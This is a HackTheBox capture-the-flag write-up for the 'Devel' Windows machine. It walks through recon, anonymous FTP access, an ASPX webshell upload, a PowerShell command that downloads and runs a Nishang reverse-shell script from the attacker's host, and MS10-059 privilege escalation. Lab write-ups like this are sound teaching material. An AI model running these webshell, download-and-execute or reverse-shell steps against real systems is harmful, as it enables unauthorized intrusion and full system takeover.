Flop.py
Posts 📖 Book CTF Results Tags Categories About us
Flop.py

Contents

🕵 HTB-Writeup : DEVEL

Pezzz included in HackTheBox
   692 words   4 minutes 
/htb-writeup-devel/featured-image.png

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Windows machine with Microsoft IIS webserver v7.5.

Dirbuster

Dirbuster scan don’t find any directories or files.

Tested extensions:

  • php
  • txt
  • xml
  • sh
  • asp
  • html

ftp server

As the ftp-anon script from nmap show, we can connect into the ftp server with the anonymous user.

1
2
3
4
5
6
7
8

└─$ ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

But we can’t find any interesting files.

Since we can’t find any directories or files, I manage to try to find vulnerabilities on the FTP server.

Firstly I download all files I can from anonymous connection. No interesting files.

1
2
3
4
5
6
7
8
9

└─$ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.5

└─$ tree 10.10.10.5 
10.10.10.5
├── aspnet_client
│   └── system_web
│       └── 2_0_50727
├── iisstart.htm
└── welcome.png

I try to bruteforce accounts from nmap nse scripts. No results.

1
2
3
4
5

└─$ nmap --script ftp-* -p 21 10.10.10.5

| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 317 seconds, average tps: 145.0

Re-checking downloaded files, I realize that I have missed an important information. The IIS webserver use this FTP server. When trying to navigate to http://10.10.10.5/aspnet_client/ we get an access denied, so the FTP server is using a IIS server.

Vulnerabilities

Knowing that, we can try to upload file to get a reverse shell.

I upload an aspx webshell on the ftp to try to execute powershell commands. The webshell can be found at /usr/share/webshells/aspx/cmdasp.aspx on a Kali Linux.

Then, I prepare the nishang reverse powershell script that can be found at this link.

Adding the following line to the bottom of the script with our IP and port.

1

Invoke-PowerShellTcp.ps1 -Reverse -IPAddress <MyIP> -Port <MyPORT>`

Then, I up a python http server with our powershell script. On the webshell, we download and execute our script

1
2

# on aspx command prompt
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<MyIP>:<MyPORT>/Invoke-PowerShellTcp.ps1')"
drawing

Command injection on the form

drawing

Response on our host

It works! We get a reverse shell!

1
2
3
4
5
6
7
8
9

Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

    Directory: C:\windows\system32\inetsrv

PS C:\windows\system32\inetsrv> whoami
iis apppool\web

We can get the user flag. Let’s go to the privesc!

privesc

I first get the content of systeminfo and pass it into the Windows-Exploit-Suggester tool.

1
2
3
4
5
6
7
8
9

└─$ python2 ../TOOLS/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo -l

[*] initiating winsploit version 3.3...
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] searching for local exploits only
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done

It gaves me 3 potentials vulnerabilities. I found this github that list multiple Windows exploit, I try the third one listed by our tool (MS10-059).

The MS10-059 vulnerability allow an attacker to run code with elevated privileges. It exploit incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services.

I download the program on the machine with a smb share, then I executed it.

drawing

Commands executed on the target

We get another reverse shell ! This time with system privileges!

drawing

Reverse shell gain on the host

Tags

Easy, External, Network, IIS, ASP, Penetration Tester Level 2, Remote Code Execution, Unrestricted File Upload

Updated on 2022-08-23
Read Markdown
 Windows-Box
Back | Home